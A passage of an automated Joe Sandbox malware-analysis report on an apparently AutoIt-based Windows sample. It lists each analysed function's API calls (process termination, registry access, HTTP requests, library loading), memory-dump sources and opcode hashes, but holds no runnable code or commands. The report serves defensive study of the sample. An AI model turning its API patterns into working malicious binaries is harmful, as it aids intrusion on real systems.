                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1423608774-0
                                                                        • Opcode ID: 995a7d63e21588dada9794e0879b9c4691703df8d71406a51f4dabd8fbd4faa3
                                                                        • Instruction ID: 4e187dbd30a0234827440d8bb6c18bc9fd5ac0ea3bad3b0a480a030373e81bf3
                                                                        • Opcode Fuzzy Hash: 995a7d63e21588dada9794e0879b9c4691703df8d71406a51f4dabd8fbd4faa3
                                                                        • Instruction Fuzzy Hash: 38018133116211ABDB152B94ED48FEB7779FF88701B040569F507E24A1DBB49841EF60
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00937C07
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00937C1D
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00937C2C
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C3B
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C45
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: 217ef8f8f8dd6b108e8ada9332a216236e117c016b3a961f856c6609b9177a80
                                                                        • Instruction ID: 7ce577674556a9845f5d93933e3e7b67f532bd7f6250975bf71095443fdb332c
                                                                        • Opcode Fuzzy Hash: 217ef8f8f8dd6b108e8ada9332a216236e117c016b3a961f856c6609b9177a80
                                                                        • Instruction Fuzzy Hash: 08F03A73256158BBE7215B929C0EEEF7B7CEFC6B15F000028FA0991051E7A05A81E6B5
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00939A33
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A44
                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A51
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A5E
                                                                          • Part of subcall function 009393D1: CloseHandle.KERNEL32(?,?,00939A6B,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 009393DB
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00939A71
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: 1ab715d98f3e95113562afad568fb7899b9b5742c3c6d399ee92a8b8e14e092e
                                                                        • Instruction ID: a9a71bf5041d8d92f4a6390efbd52d443483a644c8c3192ee3bda4bffb050711
                                                                        • Opcode Fuzzy Hash: 1ab715d98f3e95113562afad568fb7899b9b5742c3c6d399ee92a8b8e14e092e
                                                                        • Instruction Fuzzy Hash: 37F0823315A211ABD7112BA4EC8DEEB7739FF84301F140565F507A50B5DBB59842EF60
                                                                        APIs
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • __swprintf.LIBCMT ref: 008F1EA6
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008F1D49
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 2125237772-557222456
                                                                        • Opcode ID: 58cb71600b093d8e324dc26c1e9112f489bedc6a2b4997e12e295512d66b1748
                                                                        • Instruction ID: 05e430eb24542ce4a79f6e79addd06da5542bc5da114d8e54b41a3e2ae14f301
                                                                        • Opcode Fuzzy Hash: 58cb71600b093d8e324dc26c1e9112f489bedc6a2b4997e12e295512d66b1748
                                                                        • Instruction Fuzzy Hash: 08914E716082099FCB24EF28C895D7AB7A4FF95700F10491DFA96D72A1DB70ED44CB92
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0094B006
                                                                        • CharUpperBuffW.USER32(?,?), ref: 0094B115
                                                                        • VariantClear.OLEAUT32(?), ref: 0094B298
                                                                          • Part of subcall function 00939DC5: VariantInit.OLEAUT32(00000000), ref: 00939E05
                                                                          • Part of subcall function 00939DC5: VariantCopy.OLEAUT32(?,?), ref: 00939E0E
                                                                          • Part of subcall function 00939DC5: VariantClear.OLEAUT32(?), ref: 00939E1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 9d0a1cdcb916cd05dbac0ffa4f341b9c49c5ee1dc20c0abc1b366b1b79241e35
                                                                        • Instruction ID: 173370396f4cf7c803e50308ad6ee0e74a4c1fea74b4dbad76de5fc6cb43d1d5
                                                                        • Opcode Fuzzy Hash: 9d0a1cdcb916cd05dbac0ffa4f341b9c49c5ee1dc20c0abc1b366b1b79241e35
                                                                        • Instruction Fuzzy Hash: 719158746083059FCB10DF28C495E6ABBE8FF89704F04486DF99A9B3A1DB31E945CB52
                                                                        APIs
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • _memset.LIBCMT ref: 00935438
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00935467
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00935513
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0093553D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: 0156530dbb96bd25b057c9527071de01f6000934ea21e7828beee46682bde489
                                                                        • Instruction ID: 5176a0b23f12352aa1e667696ac3aac48b73c589d85f4fafed898d4f6a751b9c
                                                                        • Opcode Fuzzy Hash: 0156530dbb96bd25b057c9527071de01f6000934ea21e7828beee46682bde489
                                                                        • Instruction Fuzzy Hash: D35104726187019BD7149B28C8857BBB7ECEF89360F160A2EF896D31A1DB60DD448F52
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093027B
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009302B1
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009302C2
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00930344
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        • Opcode ID: 61597e49cdc4e4fd6922388f0a9f02096e349cbea7933dc86ac33e3bb8b7ada3
                                                                        • Instruction ID: 7f4f862206d0985de006105db6643161b833a9b6ddb5ca9953c6cb4d507276ff
                                                                        • Opcode Fuzzy Hash: 61597e49cdc4e4fd6922388f0a9f02096e349cbea7933dc86ac33e3bb8b7ada3
                                                                        • Instruction Fuzzy Hash: 42417C72605204EFDB05CF54C8A4B9A7BB9EF84314F1480A9E909DF206D7B5DA44CFA1
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00935075
                                                                        • GetMenuItemInfoW.USER32 ref: 00935091
                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009350D7
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1708,00000000), ref: 00935120
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0093E742
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0093E768
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0093E78D
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0093E7B9
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID: p1Mw`KNw
                                                                        • API String ID: 3321077145-3626030660
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00950587
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 2358735015-567219261
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0092B88E
                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0092B8A1
                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0092B8D1
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 3850602802-1403004172
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00944401
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00944427
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00944457
                                                                        • InternetCloseHandle.WININET(00000000), ref: 0094449E
                                                                          • Part of subcall function 00945052: GetLastError.KERNEL32(?,?,009443CC,00000000,00000000,00000001), ref: 00945067
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 1951874230-3916222277
                                                                        APIs
                                                                          • Part of subcall function 0090D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0090D1BA
                                                                          • Part of subcall function 0090D17C: GetStockObject.GDI32(00000011), ref: 0090D1CE
                                                                          • Part of subcall function 0090D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0090D1D8
                                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0095915C
                                                                        • LoadLibraryW.KERNEL32(?), ref: 00959163
                                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00959178
                                                                        • DestroyWindow.USER32(?), ref: 00959180
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00939588
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009395B9
                                                                        • GetStdHandle.KERNEL32(0000000C), ref: 009395CB
                                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00939605
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00939653
                                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00939683
                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00939694
                                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009396CE
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateHandle$FilePipe
                                                                        • String ID: nul
                                                                        • API String ID: 4209266947-2873401336
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0093DB0A
                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0093DB5E
                                                                        • __swprintf.LIBCMT ref: 0093DB77
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0098DC00), ref: 0093DBB5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                                        • String ID: %lu
                                                                        • API String ID: 3164766367-685833217
                                                                        APIs
                                                                          • Part of subcall function 0092C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092C84A
                                                                          • Part of subcall function 0092C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0092C85D
                                                                          • Part of subcall function 0092C82D: GetCurrentThreadId.KERNEL32 ref: 0092C864
                                                                          • Part of subcall function 0092C82D: AttachThreadInput.USER32(00000000), ref: 0092C86B
                                                                        • GetFocus.USER32 ref: 0092CA05
                                                                          • Part of subcall function 0092C876: GetParent.USER32(?), ref: 0092C884
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0092CA4E
                                                                        • EnumChildWindows.USER32(?,0092CAC4), ref: 0092CA76
                                                                        • __swprintf.LIBCMT ref: 0092CA90
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                        • String ID: %s%d
                                                                        • API String ID: 3187004680-1110647743
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009519F3
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00951A26
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00951B49
                                                                        • CloseHandle.KERNEL32(?), ref: 00951BBF
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: 7ccc7e26f78bb04e8b5921342b384d3e8a1decb0ca050741ae15f12ad305e6f7
                                                                        • Instruction ID: a3f3f1cbff646d73e5779820db730870777ebb3fd864059a6c89bc5edbbad115
                                                                        • Opcode Fuzzy Hash: 7ccc7e26f78bb04e8b5921342b384d3e8a1decb0ca050741ae15f12ad305e6f7
                                                                        • Instruction Fuzzy Hash: 41816E71600214AFDF10EF65C896BAEBBE9EF48720F148459F905AF3C2D7B4A9458B90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0095E1D5
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0095E20D
                                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 0095E248
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0095E269
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0095E281
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                                        • String ID:
                                                                        • API String ID: 3188977179-0
                                                                        • Opcode ID: 9ed8833ce9f26ca2773906db816e99be8581b3d25f0ebc7b606cadd7fbeeebcf
                                                                        • Instruction ID: 323fdec61c5d99840db0adc35decf58bae8a3c09ea984fd28d468bde2756b973
                                                                        • Opcode Fuzzy Hash: 9ed8833ce9f26ca2773906db816e99be8581b3d25f0ebc7b606cadd7fbeeebcf
                                                                        • Instruction Fuzzy Hash: 3E61C235A08604AFDB28CF6AC894FFA77BEEF89311F144059FD5997291C772AA44CB10
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00931CB4
                                                                        • VariantClear.OLEAUT32(00000013), ref: 00931D26
                                                                        • VariantClear.OLEAUT32(00000000), ref: 00931D81
                                                                        • VariantClear.OLEAUT32(?), ref: 00931DF8
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00931E26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                        • String ID:
                                                                        • API String ID: 4136290138-0
                                                                        • Opcode ID: 5a1bbf5c7989c641c20912d80beab9c5982bc54f214d74e38df9db2155dd29b9
                                                                        • Instruction ID: 7a7b678d9bb15f12ef822478877de22ce58b19b9a1837f8f3f7d838581c0c940
                                                                        • Opcode Fuzzy Hash: 5a1bbf5c7989c641c20912d80beab9c5982bc54f214d74e38df9db2155dd29b9
                                                                        • Instruction Fuzzy Hash: 455146B5A00209EFDB14CF58C880AAAB7B8FF8D314F158559E959DB350E730EA51CFA0
                                                                        APIs
                                                                          • Part of subcall function 008F936C: __swprintf.LIBCMT ref: 008F93AB
                                                                          • Part of subcall function 008F936C: __itow.LIBCMT ref: 008F93DF
                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009506EE
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0095077D
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0095079B
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 009507E1
                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 009507FB
                                                                          • Part of subcall function 0090E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0093A574,?,?,00000000,00000008), ref: 0090E675
                                                                          • Part of subcall function 0090E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0093A574,?,?,00000000,00000008), ref: 0090E699
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 327935632-0
                                                                        • Opcode ID: a54ba0161c8cf1918fb60619f2d660cf69cb88f537cc1240b5d5773ea1462b32
                                                                        • Instruction ID: 2594765b6a6d0b74b97a2bd8258b71e5c460f5682030ee95eeaf8058a990ba8a
                                                                        • Opcode Fuzzy Hash: a54ba0161c8cf1918fb60619f2d660cf69cb88f537cc1240b5d5773ea1462b32
                                                                        • Instruction Fuzzy Hash: 1B513876A00209DFCB00EFA8C895EADB7B5FF88310B148055EA55AB352DB31EE45CB81
                                                                        APIs
                                                                          • Part of subcall function 00953C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00952BB5,?,?), ref: 00953C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00952EEF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00952F2E
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00952F75
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00952FA1
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00952FAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 3740051246-0
                                                                        • Opcode ID: 508d9168cc87cb3cb4d60ad7f762d40ff454dfa379c56c7a8c009f1b1b6c50f5
                                                                        • Instruction ID: 473f909e83b3d2e42f8ebef46050e19051ed18204acf76c5871c3df23cc4f3e8
                                                                        • Opcode Fuzzy Hash: 508d9168cc87cb3cb4d60ad7f762d40ff454dfa379c56c7a8c009f1b1b6c50f5
                                                                        • Instruction Fuzzy Hash: B9513C71208308AFD704EF69D981E6AB7F9FF89314F04891DFA9597291DB30E909CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
